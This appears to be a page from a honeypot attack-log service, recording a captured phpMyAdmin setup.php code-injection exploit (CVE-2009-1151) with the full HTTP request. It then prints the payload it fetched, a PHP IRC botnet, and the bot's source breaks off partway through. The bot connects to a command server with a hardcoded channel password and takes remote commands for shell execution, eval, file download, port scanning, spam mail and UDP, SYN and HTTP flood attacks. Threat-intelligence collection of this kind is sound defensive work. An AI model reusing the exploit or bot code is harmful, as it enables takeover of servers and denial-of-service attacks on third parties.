Help on available search operators
Operators
tag: filter by relevant keywords (e.g., shellshock)
port: filter by destination port
attacker: filter by attacker IP address
country: filter by attacker country (2 letters)
since: filter since provided date (dd/mm/yyyy format)
plugin: filter by plugin ID
resource: filter requests with a resource with the given MD5
Hints
The minus operator - can be used to exclude the results containing a given keyword.
You can combine different operators, or provide multiple values for each one using comma as separator.
e.g., port:80,8080
e.g., port:80 -scripts/setup.php
e.g., upload?org.apache.catalina.filters port:8080
1-10 of 6213963 results (621397 pages)
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.110.227.41
Dest. port: 80
Time: 05/10/2019 22:05:43
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 234
cookie2: $Version="1"
Host: 114.27.169.183
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://114.27.169.183/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 91e62db93324cf2680b117e568cf6df0
Type: text/x-php
Size: 41796
URL: ftp://95.110.227.41/bot.php
<?php
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
);
var $config = array("server"=>"91.134.216.27",
"port"=>"6667",
"pass"=>"",
"prefix"=>"",
"maxrand"=>"7",
"chan"=>"#MiasmaSecurityTeam",
"chan2"=>"#MiasmaSecurityTeam",
"key"=>"",
"modes"=>"+ps",
"password"=>"MiasmaSec",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost takapusi.cok)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"#-> \2Denzo Bot Status : Online and connected \2 <-# ");
$this->privmsg($this->config['chan2'],"#-> \2Denzo BOTNET By DenzelHax 2019\2 <-# ");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: welcome $nick we missed you.");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: Wrong password $nick please check your line 49 in uploaded phpbot");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@jatimcom.cok>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#[email protected] since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <[email protected]>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "botvuln":
case "vuln":
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: #-> phpbot of Denzo BOTNET coded by Denzel <-#");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // -pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT : $nick Closed connection");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick Ndang Cewok Lek Wes Mari!!!!");
break;
case "jsbypassflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: jsbypassflood host port time [method] [url] [postFields]");
}
break;
case "masshttpv2":
if(count($mcmd)>2)
{
$this->HTTP_Flood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttpv2 host page length");
}
break;
case "massudpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudpflood host packet time");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "massudp":
if (count($mcmd) > 4) {
$this->udpfloodv2($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudp host port time packetsize");
}
break;
case "masshttp":
if (count($mcmd) > 2) {
